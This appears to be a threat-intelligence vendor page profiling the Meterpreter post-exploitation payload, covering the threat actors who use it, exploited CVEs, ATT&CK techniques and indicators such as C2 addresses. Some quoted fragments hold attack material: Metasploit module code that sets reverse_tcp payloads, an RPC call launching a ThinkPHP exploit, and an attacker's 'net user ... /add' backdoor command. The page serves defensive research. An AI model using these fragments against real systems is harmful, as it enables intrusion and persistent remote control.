Meterpreter
Meterpreter is a Metasploit post-exploitation payload and backdoor used to provide interactive remote control of compromised systems. The content describes reverse shells and bind shells, including reverse_tcp and reverse_http variants, and notes that Meterpreter can be delivered as shellcode, DLL-based stagers, or additional payloads dropped by other malware. Reported behavior includes remote command execution, post-exploitation activity inside victim networks, use as a full remote toolset, and deployment after initial compromise for persistence, lateral movement, credential theft, and follow-on payload delivery. The content also notes in-memory execution via shellcode loaders, including execution through VirtualProtect and CreateThread, and references default use of TCP 4444 for reverse shell connectivity. Meterpreter is associated with Metasploit and is frequently observed alongside tools such as Cobalt Strike, Mimikatz, PsExec, and PowerShell.
Across the provided reporting, Meterpreter was used by multiple threat actors and intrusion sets, including TA505/Hive0065, Mustang Panda, FIN12, MuddyWater, Kimsuky, Cinnamon Tempest, and actors involved in OlympicDestroyer-related intrusions. It was also observed in ransomware-linked activity, including Black Basta-associated intrusion activity and RHYSIDA operators using SYSTEMBC to inject Meterpreter shellcode. Targeting in the content spans enterprise environments, healthcare, government, NGOs, political organizations, telecoms, universities, and South Korean IIS web servers. Infection and delivery vectors mentioned include spear-phishing documents with macros, malicious archives and LNK files, DLL sideloading, compromised web servers, shellcode loaders, malvertising-delivered payload chains, and exploitation of public-facing applications such as Atlassian Confluence.
High-confidence indicators and artifacts directly mentioned in the content include Meterpreter reverse shell connections to 91.214.124.20 and 91.214.124.25 in TA505 activity, a Meterpreter C2 at 43.156.50.76 in South Korean IIS server compromises, default listener port TCP 4444, and the JA3 fingerprint 5d65ea3fb1d4aa7d826733d2f2cbbb1d for Metasploit Meterpreter running on Linux. The content also references detection of Meterpreter-like DLL characteristics, use of Go-based Meterpreter by Kimsuky, and repeated observation of Meterpreter as a common commodity post-exploitation framework and C2 family in global intrusion reporting.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } ... 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... deployed Cobalt Strike and Meterpreter payloads
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... Upon successful exploitation, they deployed Cobalt Strike and Meterpreter payloads
It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A. | The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A.
Metasploit uses printf to write the Meterpreter stager to disk in 20ish byte chunks (each exploit attempt must fit within a 26 byte buffer), which is quite slow.
Table 1: Filenames and hashes of files used by a threat actor Filename MD5 t.py (tied to scheduled task, python meterpreter reverse shell port 9090) ... g.py (tied to scheduled task, python meterpreter reverse shell port 8088) ...
Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application.
A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server... The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
Groups observed using it
22 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Tools: SpicyOmelette, Cobalt Strike, Meterpreter, Mimikatz, CobtInt, ATMSpitter, Carbanak, Buhtrap, Cyst, Metasploit.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.
Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.
Another type of stager used by Mustang Panda, some as recently as late 2021, are DLL-based implants that decode and execute Meterpreter reverse-HTTP payloads to download and execute even more payloads from the C2.
The hackers used well known tools, including Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more.
The PowerShell-based EMPIRE post-exploitation framework was used by FIN12 nearly exclusively until mid-2019 when they began to also use Cobalt Strike (BEACON), and intermittently Metasploit (METERPRETER).
"...they deployed Cobalt Strike and Meterpreter payloads to further interact with victims."
For remote access, YoroTrooper has also deployed commodity malware, such as AveMaria/Warzone RAT, LodaRAT and Meterpreter.
"The Operation Transparent Tribe report suggested that Meterpreter samples were used as payloads in the campaign..."
While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (“.sct” file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info.
Ember Bear has also used reverse TCP connections from Meterpreter installations to communicate back with C2 infrastructure.
UNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER, KOADIC, and PowerShell EMPIRE offensive security tools during this phase as well.
The unpacked shellcode is a Meterpreter payload from the offensive security framework, Metasploit... Meterpreter was observed being used to collect the SAM database using the hashdump module.
When m6699.exe executes, the threat actor can establish a Meterpreter session for remote command execution.
“...utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages.”
Both initial infection vectors delivered first-stage downloader malware to targets. The downloaders retrieved XOR-encoded versions of Meterpreter shellcode.
The IP also hosted a Meterpreter executable around the time this campaign was going on.
"FIN7 used CARBANAK’s tinymet command to spawn Meterpreter instances and give unwitting operators access to targets..."
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
3 techniquesrpc.call("module.execute", "exploit", "unix/webapp/thinkphp_rce", {"RHOSTS"=> "127.0.0.1", "RPORT"=> "80", "LHOST"=>"192.168.0.148", "LPORT"=>"4444"})
Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns against European entities... Some phishing messages contain malicious lures masquerading as official European Union reports... Other phishing emails deliver fake 'official' Ukrainian government reports.
The threat actor heavily relies on sending lures via phishing emails to achieve initial infection. These lures often masquerade as legitimate documents of national and organizational interest to the targets.
Execution
11 techniquesWindows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
if target.name == 'Windows' win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true }) win_obj.prepend('cmd.exe /c ') ... def execute_command(cmd, _opts = {}) cmd.prepend('/bin/sh -c ')
include Msf::Exploit::Powershell ... win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
def execute_command(cmd, _opts = {}) cmd.prepend('/bin/sh -c ')
The malicious macros contain two more components that are dropped to disk on the infected system.
The SLMAIL 5.5 POP3 Server has a public vulnerability (CVE-2003-0264) based on a buffer overflow on the stack that can be triggered by abusing the parameter “password” when a user attempts the authentication process.
Social engineering: Disguising the initial executable as a legitimate document to trick the target into opening it, thereby starting the infection chain.
Persistence
5 techniquesWindows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
Meterpreter バックドア、HTran ポートフォワーディングツールをインストールしたあと、攻撃者は攻撃対象のシステムに対し、持続性の維持および拠点確保のために net コマンドで攻撃者アカウントを作成した。... 2024.04.09 05:04:51 net user kr$ test123!@# /add
A Meterpreter reverser shell was used... it was installed as a service using the execution of an encoded PowerShell script... execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
Privilege Escalation
6 techniquesWindows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.
References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
A Meterpreter reverser shell was used... it was installed as a service using the execution of an encoded PowerShell script... execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
The stager begins by creating persistence for itself across reboots via the registry Run key...
In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly... then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
Stealth
5 techniquesBUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
Alternate data streams (ADS) are a little-known but potent feature of the NTFS file system that enable data to be hidden within files—without altering their visible size or content. | Cybercriminals are increasingly using ADS to hide malicious payloads, tools, or data in a way that bypasses traditional detection methods.
This malicious DLL needs to be dropped in one of the folders that windows are loading DLL files. As it can be see below when the service restarted a Meterpreter session opened with SYSTEM privileges through DLL hijacking.
If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
The implant will download this file directly into memory. It then sets the area of memory via the VirtualProtect Windows API call to executable by passing in 0x40, and then executes it via the CreateThread call... Unlike the loader, the implant does not write the downloaded shellcode file to disk before execution.
Discovery
3 techniquesUse in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
攻撃者は、Web サーバーに Meterpreter バックドアをインストールする前に ipconfig、systeminfo など、多種の正常なユーティリティを実行していた。これは、攻撃者が IIS モジュールマルウェアのインストール前に攻撃対象の情報を収集するための目的と見られる。
The commands executed were used for discovery purposes, listing members of privileged groups and network information.
Lateral Movement
3 techniquesGOLD KINGSWOOD is a cybercriminal group that uses tactics more commonly associated with government-sponsored threat actors to infiltrate the internal networks of financial institutions around the globe.
The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network.
Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
Command and Control
4 techniques"via_payload"=>"payload/linux/x64/meterpreter/reverse_tcp", "desc"=>"Meterpreter", "tunnel_local"=>"192.168.0.148:4444"
Meterpreter バックドアのインストール後、攻撃者はさらに w3wp.exe プロセスを通じて HTran ユーティリティをインストールした。HTran は Github にソースコードが公開されているポートフォワーディングツールである。
This script then executes within the context of the Android application and can potentially instruct the device to download a malicious payload from the attacker’s server, providing access to the user’s phone with the privileges of the application.
SDBbot RAT has been observed... This malware features remote-access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks.
IOCs tracked for this family
79 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
104 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as an example of a real-world implant/payload used in exploitation workflows.
Referenced as malware/tooling observed using Windows command obfuscation via environment variable substring extraction to hide command intent.
Meterpreter is referenced as the payload downloaded after Confluence exploitation, providing the attacker full control over the compromised server.
Meterpreter is referenced as a Metasploit payload used to generate a malicious DLL that provides reverse shell/backdoor access to a victim system.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.